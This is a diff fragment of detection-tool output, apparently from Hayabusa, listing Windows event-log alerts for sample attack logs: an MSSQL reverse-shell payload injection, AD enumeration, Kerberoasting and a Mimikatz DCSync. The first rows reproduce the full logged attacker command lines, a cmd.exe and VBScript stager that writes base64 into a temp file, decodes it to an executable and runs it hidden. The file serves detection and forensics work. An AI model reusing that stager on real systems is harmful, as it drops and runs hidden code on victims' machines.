QAZQBkACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAaQBzACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAbwBuACAAYQBuACAAIgBBAFMAIABJAFMAIgAgAEIAQQBTAEkAUwAsACAAVwBJAFQASABPAFUAVAAgAFcAQQBSAFIAQQBOAFQASQBFAFMAIABPAFIAIABDAE8ATgBEAEkAVABJAE8ATgBTACAATwBGACAAQQBOAFkAIABLAEkATgBEACwAIABlAGkAdABoAGUAcgAgAGUAeABwAHIAZQBzAHMAIABvAHIAIABpAG0AcABsAGkAZQBkAC4AIABTAGUAZQAgAHQAaABlACAATABpAGMAZQBuAHMAZQAgAGYAbwByACAAdABoAGUAIABzAHAAZQBjAGkAZgBpAGMAIABsAGEAbgBnAHUAYQBnAGUAIABnAG8AdgBlAHIA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:26.991 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo bgBpAG4AZwAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAgAGEAbgBkACAAbABpAG0AaQB0AGEAdABpAG8AbgBzACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlAC4AAABWABsAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAAUwBvAGYAdAB3AGEAcgBlACAARgBvAHUAbgBkAGEAdABpAG8AbgAAAAAAagAhAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEEAcABhAGMAaABlAEIAZQBuAGMAaAAgAGMAbwBtAG0AYQBuAGQAIABsAGkAbgBlACAAdQB0AGkAbABpAHQAeQAAAAAALgAHAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAyAC4AMgAuADEANAAAAAAALgAHAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABhAGIALgBlAHgAZQAAAAAAggAvAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIAAyADAAMAA5ACAAVABoAGUAIABBAHAAYQBjAGgAZQAgAFMAbwBmAHQAdwBhAHIAZQAgAEYAbwB1AG4AZABhAHQAaQBvAG4ALgAAAAAANgAHAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAGEAYgAuAGUAeABlAAAAAABGABMAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAASABUAFQAUAAgAFMAZQByAHYAZQByAAAAAAAyAAcAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAyAC4AMgAuADEANAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAkEsAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:27.266 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:27.540 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:27.815 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:28.092 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = ""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:28.113 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User:  | Svc:  | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,../hayabusa-rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c41e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.200 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.212 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,../hayabusa-rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
